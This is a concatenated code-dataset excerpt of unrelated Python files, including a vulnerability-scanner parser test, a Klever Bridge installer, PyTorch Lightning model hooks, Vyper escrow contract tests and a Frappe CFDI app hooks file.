        self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', finding.cvssv3)
        self.assertEqual('Critical', finding.severity)
        self.assertIsNone(finding.mitigation)
        references = '''**Vulnerability Datasource:** https://security-tracker.debian.org/tracker/CVE-2021-33574
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-33574
**Related Vulnerability URLs:**
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/
- https://security.netapp.com/advisory/ntap-20210629-0005/
- https://security.gentoo.org/glsa/202107-07
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/'''
        self.assertEqual(references, finding.references)
        self.assertEqual('libc-bin', finding.component_name)
        self.assertEqual('2.28-10', finding.component_version)
        self.assertEqual('CVE-2021-33574', finding.vuln_id_from_tool)
        self.assertEqual(['dpkg'], finding.tags)
        self.assertEqual(1, finding.nb_occurences)
        finding = findings[3]
        self.assertEqual('CVE-2021-33574 in libc6:2.28-10', finding.title)
        description = '''**Vulnerability Id:** CVE-2021-33574
**Vulnerability Namespace:** debian:10
**Related Vulnerability Description:** The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.
**Matcher:** dpkg-matcher
**Package URL:** pkg:deb/debian/libc6@2.28-10?arch=amd64'''
        self.assertEqual(description, finding.description)
        self.assertEqual('CVE-2021-33574', finding.cve)
        self.assertEqual(1352, finding.cwe)
        self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', finding.cvssv3)
        self.assertEqual('Critical', finding.severity)
        self.assertIsNone(finding.mitigation)
        references = '''**Vulnerability Datasource:** https://security-tracker.debian.org/tracker/CVE-2021-33574
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-33574
**Related Vulnerability URLs:**
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/
- https://security.netapp.com/advisory/ntap-20210629-0005/
- https://security.gentoo.org/glsa/202107-07
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/'''
        self.assertEqual(references, finding.references)
        self.assertEqual('libc6', finding.component_name)
        self.assertEqual('2.28-10', finding.component_version)
        self.assertEqual('CVE-2021-33574', finding.vuln_id_from_tool)
        self.assertEqual(['dpkg'], finding.tags)
        self.assertEqual(1, finding.nb_occurences)
        # findings[4]: GHSA advisory with a related CVE; the CVE goes into
        # finding.cve while vuln_id_from_tool keeps the GHSA id. This one is
        # deduplicated (nb_occurences == 2).
        finding = findings[4]
        self.assertEqual('CVE-2021-44420 in Django:3.2.9', finding.title)
        description = '''**Vulnerability Id:** GHSA-v6rh-hp5x-86rv
**Vulnerability Namespace:** github:python
**Vulnerability Description:** Potential bypass of an upstream access control based on URL paths in Django
**Related Vulnerability Id:** CVE-2021-44420
**Related Vulnerability Description:** In Django 2.2 before 2.2.25, 3.1 before 3.1.14, and 3.2 before 3.2.10, HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths.
**Matcher:** python-matcher
**Package URL:** pkg:pypi/Django@3.2.9'''
        self.assertEqual(description, finding.description)
        self.assertEqual('CVE-2021-44420', finding.cve)
        self.assertEqual(1352, finding.cwe)
        self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L', finding.cvssv3)
        self.assertEqual('High', finding.severity)
        mitigation = 'Upgrade to version: 3.2.10'
        self.assertEqual(mitigation, finding.mitigation)
        references = '''**Vulnerability Datasource:** https://github.com/advisories/GHSA-v6rh-hp5x-86rv
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-44420
**Related Vulnerability URLs:**
- https://docs.djangoproject.com/en/3.2/releases/security/
- https://www.openwall.com/lists/oss-security/2021/12/07/1
- https://www.djangoproject.com/weblog/2021/dec/07/security-releases/
- https://groups.google.com/forum/#!forum/django-announce'''
        self.assertEqual(references, finding.references)
        self.assertEqual('Django', finding.component_name)
        self.assertEqual('3.2.9', finding.component_version)
        self.assertEqual('GHSA-v6rh-hp5x-86rv', finding.vuln_id_from_tool)
        self.assertEqual(['python'], finding.tags)
        self.assertEqual(2, finding.nb_occurences)
| 59.731225 | 727 | 0.712149 |
6e520a6e43ff993b8d0a45bc164c430d25358e15 | 180 | py | Python | tutor_scheduler/scheduler/admin.py | tylertaewook/tutor-scheduler-django | 5d767fe548960952ac9deae25c00aa1ba98a77ac | [
"MIT"
] | 1 | 2021-12-14T04:49:05.000Z | 2021-12-14T04:49:05.000Z | tutor_scheduler/scheduler/admin.py | tylertaewook/tutor-scheduler-django | 5d767fe548960952ac9deae25c00aa1ba98a77ac | [
"MIT"
] | 5 | 2022-01-27T17:42:55.000Z | 2022-03-28T17:30:47.000Z | tutor_scheduler/scheduler/admin.py | tylertaewook/tutor-scheduler-django | 5d767fe548960952ac9deae25c00aa1ba98a77ac | [
"MIT"
] | null | null | null | from django.contrib import admin
from tutor_scheduler.scheduler.models import Issue, Session
# Register your models here.
admin.site.register(Session)
admin.site.register(Issue)
| 22.5 | 59 | 0.822222 |
b4e18546fd3008b35405e6a4ede5154374d90c2b | 1,348 | py | Python | aalh_iit_buildings_011/populate-cov-long-lat.py | johndewees/iitmigration | 4dadfbecda719d6e7d60af076a231aedec3c862f | [
"Unlicense"
] | null | null | null | aalh_iit_buildings_011/populate-cov-long-lat.py | johndewees/iitmigration | 4dadfbecda719d6e7d60af076a231aedec3c862f | [
"Unlicense"
] | null | null | null | aalh_iit_buildings_011/populate-cov-long-lat.py | johndewees/iitmigration | 4dadfbecda719d6e7d60af076a231aedec3c862f | [
"Unlicense"
] | null | null | null | from openpyxl import load_workbook
import re
filename = 'aalh_iit_buildings_011.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 8
maximumcol = 8
minimumrow = 7
maximumrow = 1357
iterationrow = 7
desccol = 8
covcol = 10
latcol = 11
longcol = 12
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
testvar = ws.cell(row=iterationrow, column=desccol).value
for cell in row:
if testvar == None:
continue
elif testvar.find('Old Main') != -1:
continue
elif testvar.find('Main Library') != -1:
ws.cell(row=iterationrow, column=covcol).value = '325 Michigan Street'
ws.cell(row=iterationrow, column=latcol).value = '41.654358'
ws.cell(row=iterationrow, column=longcol).value = '-83.539662'
print(iterationrow,'MAIN LIBRARY')
elif testvar.find('West Toledo') != -1:
ws.cell(row=iterationrow, column=covcol).value = '1320 West Sylvania Avenue'
ws.cell(row=iterationrow, column=latcol).value = '41.69297'
ws.cell(row=iterationrow, column=longcol).value = '-83.572885'
print(iterationrow,'WEST TOLEDO')
iterationrow = iterationrow + 1
#wb.save("aalh_iit_buildings_011.xlsx") | 36.432432 | 105 | 0.646142 |
57032d6549fe9dda319061a782e2638724ecbfc0 | 5,161 | py | Python | klever/deploys/install_klever_bridge.py | PRITI1999/klever | ac80edf4301c15f6b63e35837f4ffbf7e3e68809 | [
"Apache-2.0"
] | 1 | 2021-01-09T08:44:37.000Z | 2021-01-09T08:44:37.000Z | klever/deploys/install_klever_bridge.py | Abhik1998/klever | 827bbd31b29e213bf74cb1d1b158153e62a2933e | [
"Apache-2.0"
] | 3 | 2021-03-19T09:15:16.000Z | 2021-09-22T19:24:40.000Z | klever/deploys/install_klever_bridge.py | Abhik1998/klever | 827bbd31b29e213bf74cb1d1b158153e62a2933e | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2018 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import sys
from klever.deploys.utils import Cd, execute_cmd, get_logger, start_services, stop_services, get_media_user
# Shared installation steps for both the development and the production
# flavours of Klever Bridge.
def _install_klever_bridge(logger):
    """Compile translations, migrate the database and populate default data.

    Must be invoked with the current working directory set to the Bridge
    source tree (every step is a ``./manage.py`` call).
    """
    def manage(*cli_args):
        # All steps run ./manage.py under the current Python interpreter.
        execute_cmd(logger, sys.executable, './manage.py', *cli_args)

    logger.info('Update translations')
    manage('compilemessages')
    logger.info('Migrate database')
    manage('migrate')
    logger.info('Populate database')
    # Default accounts: (username == password by convention) plus role flags.
    for username, extra_args in (
            ('admin', ('--staff', '--superuser')),
            ('manager', ('--role', '2')),
            ('service', ('--role', '4'))):
        manage('createuser', '--username', username, '--password', username, *extra_args)
    manage('populate', '--all')
def install_klever_bridge_development(logger, src_dir):
    """Install or update the development flavour of Klever Bridge.

    Stops the development services, runs the shared install steps inside the
    source tree's ``bridge`` directory, then restarts the services.

    Args:
        logger: Logger used for progress messages and command execution.
        src_dir: Path to the Klever source checkout.
    """
    logger.info('Install/update development Klever Bridge')
    services = ('klever-bridge-development', 'klever-celery-development', 'klever-celerybeat-development')
    stop_services(logger, services)
    with Cd(os.path.join(src_dir, 'bridge')):
        _install_klever_bridge(logger)
    start_services(logger, services)
def install_klever_bridge_production(logger, src_dir, deploy_dir, populate_just_production_presets=True):
    """Install or update the production flavour of Klever Bridge.

    Stops NGINX and the Bridge services, deploys the NGINX site config and the
    Bridge source tree under ``/var/www/klever-bridge``, prepares the media
    directory as a symlink into the deployment directory, runs the shared
    install steps, collects static files, fixes ownership and restarts the
    services.

    Args:
        logger: Logger used for progress messages and command execution.
        src_dir: Path to the Klever source checkout.
        deploy_dir: Deployment directory; real media storage is created under
            it as ``klever-media``.
        populate_just_production_presets: When False, an override is appended
            to settings.py so non-production presets are populated as well.
    """
    logger.info('Install/update production Klever Bridge')
    services = ('nginx', 'klever-bridge', 'klever-celery', 'klever-celerybeat')
    stop_services(logger, services)
    logger.info('Copy Klever Bridge configuration file for NGINX')
    copy_from = os.path.join(src_dir, 'bridge/conf/nginx')
    # Debian-style NGINX layouts use sites-enabled; others use conf.d.
    if os.path.exists('/etc/nginx/sites-enabled'):
        shutil.copy(copy_from, '/etc/nginx/sites-enabled/klever-bridge.conf')
    else:
        shutil.copy(copy_from, '/etc/nginx/conf.d/klever-bridge.conf')
    logger.info('Install/update Klever Bridge source/binary code')
    shutil.rmtree('/var/www/klever-bridge', ignore_errors=True)
    shutil.copytree(os.path.join(src_dir, 'bridge'), '/var/www/klever-bridge/bridge',
                    ignore=shutil.ignore_patterns('test_files'))
    shutil.copytree(os.path.join(src_dir, 'presets'), '/var/www/klever-bridge/presets')
    logger.info('Prepare media directory')
    media = '/var/www/klever-bridge/bridge/media'
    media_real = os.path.join(os.path.realpath(deploy_dir), 'klever-media')
    # Replace the copied media directory with a symlink into the deployment
    # directory so uploaded data lives outside the web root.
    shutil.rmtree(media)
    execute_cmd(logger, 'mkdir', '-p', media_real)
    execute_cmd(logger, 'ln', '-s', '-T', media_real, media)
    with Cd('/var/www/klever-bridge/bridge'):
        with open('bridge/settings.py', 'w') as fp:
            fp.write('from bridge.production import *\n')
            if not populate_just_production_presets:
                fp.write('POPULATE_JUST_PRODUCTION_PRESETS = False\n')
        _install_klever_bridge(logger)
        logger.info('Collect static files')
        execute_cmd(logger, sys.executable, './manage.py', 'collectstatic', '--noinput')
    # Make available data from media, logs and static for its actual user.
    media_user = get_media_user(logger)
    user_group = '{}:{}'.format(media_user, media_user)
    execute_cmd(logger, 'chown', '-R', user_group, media_real)
    execute_cmd(logger, 'chown', '-R', user_group, '/var/www/klever-bridge/bridge/logs')
    execute_cmd(logger, 'chown', '-R', user_group, '/var/www/klever-bridge/bridge/static')
    # Best effort: add httpd_t to the list of permissive SELinux domains.
    # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit are no
    # longer swallowed; a missing/failing semanage tool is still tolerated.
    try:
        execute_cmd(logger, 'semanage', 'permissive', '-a', 'httpd_t')
    except Exception:
        pass
    start_services(logger, services)
def main():
    """Command-line entry point: install the development or production Bridge."""
    import argparse

    arg_parser = argparse.ArgumentParser()
    # (flag, keyword options) pairs for every supported command-line option.
    for flag, kwargs in (
            ('--development', {'default': False, 'action': 'store_true'}),
            ('--source-directory', {'default': 'klever'}),
            ('--deployment-directory', {'default': 'klever-inst'})):
        arg_parser.add_argument(flag, **kwargs)
    options = arg_parser.parse_args()

    logger = get_logger(__name__)
    if options.development:
        install_klever_bridge_development(logger, options.source_directory)
    else:
        install_klever_bridge_production(logger, options.source_directory, options.deployment_directory)


if __name__ == '__main__':
    main()
| 39.7 | 112 | 0.692889 |
e3e9e0844e9b768dee82efb822a5b0c842dd3612 | 3,144 | py | Python | pogo/POGOProtos_o/Networking/Requests/Messages/UseItemPotionMessage_pb2.py | josenavarro-famoco/flask-pg | 501f8561b3532d0c8b122128384d3e855f0f6cb4 | [
"MIT"
] | 183 | 2016-07-26T11:43:40.000Z | 2022-03-01T07:40:19.000Z | pogo/POGOProtos_o/Networking/Requests/Messages/UseItemPotionMessage_pb2.py | josenavarro-famoco/flask-pg | 501f8561b3532d0c8b122128384d3e855f0f6cb4 | [
"MIT"
] | 60 | 2016-07-26T18:07:05.000Z | 2017-05-22T12:09:55.000Z | pogo/POGOProtos_o/Networking/Requests/Messages/UseItemPotionMessage_pb2.py | josenavarro-famoco/flask-pg | 501f8561b3532d0c8b122128384d3e855f0f6cb4 | [
"MIT"
] | 58 | 2016-07-26T11:54:07.000Z | 2022-03-01T09:17:09.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/UseItemPotionMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Inventory.Item import ItemId_pb2 as POGOProtos_dot_Inventory_dot_Item_dot_ItemId__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/UseItemPotionMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nBPOGOProtos/Networking/Requests/Messages/UseItemPotionMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\x1a&POGOProtos/Inventory/Item/ItemId.proto\"^\n\x14UseItemPotionMessage\x12\x32\n\x07item_id\x18\x01 \x01(\x0e\x32!.POGOProtos.Inventory.Item.ItemId\x12\x12\n\npokemon_id\x18\x02 \x01(\x04\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Inventory_dot_Item_dot_ItemId__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_USEITEMPOTIONMESSAGE = _descriptor.Descriptor(
name='UseItemPotionMessage',
full_name='POGOProtos.Networking.Requests.Messages.UseItemPotionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='POGOProtos.Networking.Requests.Messages.UseItemPotionMessage.item_id', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pokemon_id', full_name='POGOProtos.Networking.Requests.Messages.UseItemPotionMessage.pokemon_id', index=1,
number=2, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=151,
serialized_end=245,
)
_USEITEMPOTIONMESSAGE.fields_by_name['item_id'].enum_type = POGOProtos_dot_Inventory_dot_Item_dot_ItemId__pb2._ITEMID
DESCRIPTOR.message_types_by_name['UseItemPotionMessage'] = _USEITEMPOTIONMESSAGE
UseItemPotionMessage = _reflection.GeneratedProtocolMessageType('UseItemPotionMessage', (_message.Message,), dict(
DESCRIPTOR = _USEITEMPOTIONMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.UseItemPotionMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.UseItemPotionMessage)
))
_sym_db.RegisterMessage(UseItemPotionMessage)
# @@protoc_insertion_point(module_scope)
| 39.3 | 339 | 0.798664 |
77a5d0b4c0d33e28979998af1ae7f7f64b344169 | 1,978 | py | Python | tests/parser/integration/test_escrow.py | lrettig/viper | 4abdd2b59b58fe87ca0aee05c792a6e0363b5358 | [
"MIT"
] | null | null | null | tests/parser/integration/test_escrow.py | lrettig/viper | 4abdd2b59b58fe87ca0aee05c792a6e0363b5358 | [
"MIT"
] | null | null | null | tests/parser/integration/test_escrow.py | lrettig/viper | 4abdd2b59b58fe87ca0aee05c792a6e0363b5358 | [
"MIT"
] | 1 | 2018-09-02T22:47:00.000Z | 2018-09-02T22:47:00.000Z | import pytest
from tests.setup_transaction_tests import chain as s, tester as t, ethereum_utils as u, check_gas, \
get_contract_with_gas_estimation, get_contract
def test_arbitration_code():
    """Escrow contract: only the buyer or the arbitrator may finalize."""
    arbitration_code = """
buyer: address
seller: address
arbitrator: address
@public
def setup(_seller: address, _arbitrator: address):
    if not self.buyer:
        self.buyer = msg.sender
        self.seller = _seller
        self.arbitrator = _arbitrator
@public
def finalize():
    assert msg.sender == self.buyer or msg.sender == self.arbitrator
    send(self.seller, self.balance)
@public
def refund():
    assert msg.sender == self.seller or msg.sender == self.arbitrator
    send(self.buyer, self.balance)
"""
    c = get_contract_with_gas_estimation(arbitration_code, value=1)
    # buyer = a0 (the sender), seller = a1, arbitrator = a2.
    c.setup(t.a1, t.a2, sender=t.k0)
    # The seller (k1) must not be able to finalize. Catch only
    # TransactionFailed (as test_arbitration_code_with_init does): the
    # original bare ``except:`` also treated any unrelated error — e.g. a
    # typo in the call — as the expected failure, silently passing the test.
    try:
        c.finalize(sender=t.k1)
        success = True
    except t.TransactionFailed:
        success = False
    assert not success
    # The buyer (k0) can finalize.
    c.finalize(sender=t.k0)
    print('Passed escrow test')
def test_arbitration_code_with_init():
    """Same escrow contract as test_arbitration_code, but the parties are
    wired up in the payable constructor instead of a separate setup() call."""
    arbitration_code_with_init = """
buyer: address
seller: address
arbitrator: address
@public
@payable
def __init__(_seller: address, _arbitrator: address):
    if not self.buyer:
        self.buyer = msg.sender
        self.seller = _seller
        self.arbitrator = _arbitrator
@public
def finalize():
    assert msg.sender == self.buyer or msg.sender == self.arbitrator
    send(self.seller, self.balance)
@public
def refund():
    assert msg.sender == self.seller or msg.sender == self.arbitrator
    send(self.buyer, self.balance)
"""
    # buyer = a0 (constructor sender), seller = a1, arbitrator = a2.
    c = get_contract_with_gas_estimation(arbitration_code_with_init,
                                         args=[t.a1, t.a2], sender=t.k0, value=1)
    # The seller (k1) must not be able to finalize the escrow.
    try:
        c.finalize(sender=t.k1)
        success = True
    except t.TransactionFailed:
        success = False
    assert not success
    # The buyer (k0) can finalize, which sends the balance to the seller.
    c.finalize(sender=t.k0)
    print('Passed escrow test with initializer')
| 24.725 | 100 | 0.674419 |
4db8366130b20a3d661bcd9dd3541fa1981b2cca | 230 | py | Python | setup.py | mistamun/repo2dockerspawner | fb9cf490735c576eb05d6a086f03d0e5354a2849 | [
"BSD-3-Clause"
] | 5 | 2019-06-16T12:53:24.000Z | 2021-07-27T10:53:30.000Z | setup.py | mistamun/repo2dockerspawner | fb9cf490735c576eb05d6a086f03d0e5354a2849 | [
"BSD-3-Clause"
] | 6 | 2019-05-19T00:16:01.000Z | 2020-09-22T18:39:55.000Z | setup.py | mistamun/repo2dockerspawner | fb9cf490735c576eb05d6a086f03d0e5354a2849 | [
"BSD-3-Clause"
] | 4 | 2019-06-12T14:57:58.000Z | 2019-11-14T20:22:53.000Z | from setuptools import setup, find_packages
setup(
name='jupyterhub-repo2dockerspawner',
version='0.1',
packages=find_packages(),
install_requires=[
'dockerspawner',
'jupyter-repo2docker'
],
)
| 19.166667 | 43 | 0.66087 |
960c7124383b0b311eba34ff2e81bc73715681e1 | 6,881 | py | Python | pytorch_lightning/core/hooks.py | uditarora/pytorch-lightning | 7245e48153909d9de8458b1f5b8b2bc740d80104 | [
"Apache-2.0"
] | null | null | null | pytorch_lightning/core/hooks.py | uditarora/pytorch-lightning | 7245e48153909d9de8458b1f5b8b2bc740d80104 | [
"Apache-2.0"
] | null | null | null | pytorch_lightning/core/hooks.py | uditarora/pytorch-lightning | 7245e48153909d9de8458b1f5b8b2bc740d80104 | [
"Apache-2.0"
] | null | null | null | from typing import Any
import torch
from torch import Tensor
from torch.optim.optimizer import Optimizer
from pytorch_lightning.utilities import move_data_to_device
try:
from apex import amp
except ImportError:
APEX_AVAILABLE = False
else:
APEX_AVAILABLE = True
class ModelHooks(torch.nn.Module):
    """Mixin defining the lifecycle hook methods a LightningModule can override.

    Most hooks below have empty bodies and exist purely as override points
    invoked at the corresponding stage of the loop; ``backward`` and
    ``transfer_batch_to_device`` ship default implementations that can be
    customised.
    """
    # TODO: remove in v0.9.0
    def on_sanity_check_start(self):
        """
        Called before starting evaluation.
        Warning:
            Deprecated. Will be removed in v0.9.0.
        """
    def on_train_start(self) -> None:
        """
        Called at the beginning of training before sanity check.
        """
        # do something at the start of training
    def on_train_end(self) -> None:
        """
        Called at the end of training before logger experiment is closed.
        """
        # do something at the end of training
    def on_batch_start(self, batch: Any) -> None:
        """
        Called in the training loop before anything happens for that batch.
        If you return -1 here, you will skip training for the rest of the current epoch.
        Args:
            batch: The batched data as it is returned by the training DataLoader.
        """
        # do something when the batch starts
    def on_batch_end(self) -> None:
        """
        Called in the training loop after the batch.
        """
        # do something when the batch ends
    def on_epoch_start(self) -> None:
        """
        Called in the training loop at the very beginning of the epoch.
        """
        # do something when the epoch starts
    def on_epoch_end(self) -> None:
        """
        Called in the training loop at the very end of the epoch.
        """
        # do something when the epoch ends
    def on_pre_performance_check(self) -> None:
        """
        Called at the very beginning of the validation loop.
        """
        # do something before validation starts
    def on_post_performance_check(self) -> None:
        """
        Called at the very end of the validation loop.
        """
        # do something before validation end
    def on_before_zero_grad(self, optimizer: Optimizer) -> None:
        """
        Called after optimizer.step() and before optimizer.zero_grad().
        Called in the training loop after taking an optimizer step and before zeroing grads.
        Good place to inspect weight information with weights updated.
        This is where it is called::
            for optimizer in optimizers:
                optimizer.step()
                model.on_before_zero_grad(optimizer) # < ---- called here
                optimizer.zero_grad
        Args:
            optimizer: The optimizer for which grads should be zeroed.
        """
        # do something with the optimizer or inspect it.
    def on_after_backward(self) -> None:
        """
        Called in the training loop after loss.backward() and before optimizers do anything.
        This is the ideal place to inspect or log gradient information.
        Example::
            def on_after_backward(self):
                # example to inspect gradient information in tensorboard
                if self.trainer.global_step % 25 == 0: # don't make the tf file huge
                    params = self.state_dict()
                    for k, v in params.items():
                        grads = v
                        name = k
                        self.logger.experiment.add_histogram(tag=name, values=grads,
                                                             global_step=self.trainer.global_step)
        """
    def backward(self, trainer, loss: Tensor, optimizer: Optimizer, optimizer_idx: int) -> None:
        """
        Override backward with your own implementation if you need to.
        Args:
            trainer: Pointer to the trainer
            loss: Loss is already scaled by accumulated grads
            optimizer: Current optimizer being used
            optimizer_idx: Index of the current optimizer being used
        Called to perform backward step.
        Feel free to override as needed.
        The loss passed in has already been scaled for accumulated gradients if requested.
        Example::
            def backward(self, use_amp, loss, optimizer):
                if use_amp:
                    with amp.scale_loss(loss, optimizer) as scaled_loss:
                        scaled_loss.backward()
                else:
                    loss.backward()
        """
        if trainer.precision == 16:
            # .backward is not special on 16-bit with TPUs
            if trainer.on_tpu:
                return
            # NOTE(review): the branch below reads ``self.trainer`` while the
            # checks above use the ``trainer`` argument — presumably the same
            # object; confirm before refactoring.
            if self.trainer.use_native_amp:
                self.trainer.scaler.scale(loss).backward()
            # TODO: remove in v0.8.0
            else:
                with amp.scale_loss(loss, optimizer) as scaled_loss:
                    scaled_loss.backward()
        else:
            loss.backward()
    def transfer_batch_to_device(self, batch: Any, device: torch.device) -> Any:
        """
        Override this hook if your :class:`~torch.utils.data.DataLoader` returns tensors
        wrapped in a custom data structure.
        The data types listed below (and any arbitrary nesting of them) are supported out of the box:
        - :class:`torch.Tensor`
        - :class:`list`
        - :class:`dict`
        - :class:`tuple`
        - ``torchtext.data.Batch`` (COMING SOON)
        For anything else, you need to define how the data is moved to the target device (CPU, GPU, TPU, ...).
        Example::
            def transfer_batch_to_device(self, batch, device)
                if isinstance(batch, CustomBatch):
                    # move all tensors in your custom data structure to the device
                    batch.samples = batch.samples.to(device)
                    batch.targets = batch.targets.to(device)
                else:
                    batch = super().transfer_batch_to_device(data, device)
                return batch
        Args:
            batch: A batch of data that needs to be transferred to a new device.
            device: The target device as defined in PyTorch.
        Returns:
            A reference to the data on the new device.
        Note:
            This hook should only transfer the data and not modify it, nor should it move the data to
            any other device than the one passed in as argument (unless you know what you are doing).
            The :class:`~pytorch_lightning.trainer.trainer.Trainer` already takes care of splitting the
            batch and determines the target devices.
        See Also:
            - :func:`~pytorch_lightning.utilities.apply_func.move_data_to_device`
            - :func:`~pytorch_lightning.utilities.apply_func.apply_to_collection`
        """
        return move_data_to_device(batch, device)
| 33.896552 | 110 | 0.593518 |
4c2ce44786720c852df419782722893edd9718e9 | 4,169 | py | Python | cfdi/hooks.py | dacosta2213/cfdi | d383940cb1b333207fce9c2e70d55907dd441ca1 | [
"MIT"
] | null | null | null | cfdi/hooks.py | dacosta2213/cfdi | d383940cb1b333207fce9c2e70d55907dd441ca1 | [
"MIT"
] | null | null | null | cfdi/hooks.py | dacosta2213/cfdi | d383940cb1b333207fce9c2e70d55907dd441ca1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "cfdi"
app_title = "Cfdi"
app_publisher = "CODIGO BINARIO"
app_description = "CFDI for Frappe"
app_icon = " 'octicon octicon-file-binary'"
app_color = " 'octicon octicon-file-binary' , icon color: #2488ee"
app_email = "soporte@posix.mx"
app_license = "MIT"
# RG- 24-Jul-2019 - Quite Print Format (son nativos), Translation y UOM porque nomas chocaban con las instalaciones de los clientes
fixtures = [
# "CFDI Clave Producto",
# "CFDI Regimen Fiscal",
# "CFDI Uso",
# "Configuracion CFDI",
# "CFDI Metodo Pago",
# "CFDI Tipo De Comprobante",
# "CFDI Forma de Pago",
# "CFDI Clave Unidad",
# "CFDI Relacion Documentos",
# Para mover todos los cambios de una instancia a otra
# {"dt":"Custom Field", "filters": [["dt", "in", ("Sales Invoice", "Sales Invoice Item","Item","User", "Customer", "Address","Payment Entry","Payment Entry Reference")]]},
# {"dt":"Property Setter", "filters": [["doc_type", "in", ("Customize Form Field","Opportunity","Sales Invoice", "Sales Invoice Item", "Item","User", "Customer", "Address","Payment Entry Reference")]]},
# Solo cambios que impacten payment entry
{"dt":"Custom Field", "filters": [ ["dt", "in", ("Sales Invoice","CFDI Nota de Credito","Payment Entry","Payment Entry Reference")] ]},
{"dt":"Property Setter", "filters": [["doc_type", "in", ("Sales Invoice","CFDI Nota de Credito","Payment Entry","Payment Entry Reference")] ]},
]
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/cfdi/css/cfdi.css"
# app_include_js = "/assets/cfdi/js/cfdi.js"
# include js, css files in header of web template
# web_include_css = "/assets/cfdi/css/cfdi.css"
# web_include_js = "/assets/cfdi/js/cfdi.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# Client-side scripts injected into the corresponding doctype form views.
# Keys are doctype names; values are paths to the JS bundles, both read by
# Frappe verbatim.
doctype_js = {
    "Sales Invoice" : "public/js/cfdi_sales_invoice.js",
    "Payment Entry" : "public/js/payment_entry_client.js",
    "CFDI Nota de Credito" : "public/js/cfdi_nota_de_credito.js",
    "Delivery Trip" : "public/js/delivery_trip.js"
}
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "cfdi.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "cfdi.install.before_install"
# after_install = "cfdi.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "cfdi.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
